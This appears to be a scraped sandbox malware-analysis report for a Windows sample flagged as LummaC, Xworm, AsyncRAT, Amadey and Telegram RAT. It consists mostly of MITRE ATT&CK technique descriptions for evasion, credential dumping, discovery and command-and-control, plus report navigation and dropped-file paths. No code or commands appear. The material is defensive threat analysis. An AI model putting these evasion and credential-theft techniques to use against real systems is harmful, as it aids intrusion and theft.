Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Xworm

Threatname: Telegram RAT

Threatname: Amadey

Threatname: AsyncRAT

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2gwmtZs.exe_59a80e65a8214b2e97933ef63c19e4a2556e797_93df432c_56a585a5-2ebb-4689-9dc6-26a561bd4ba7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD572.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD61F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD862.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre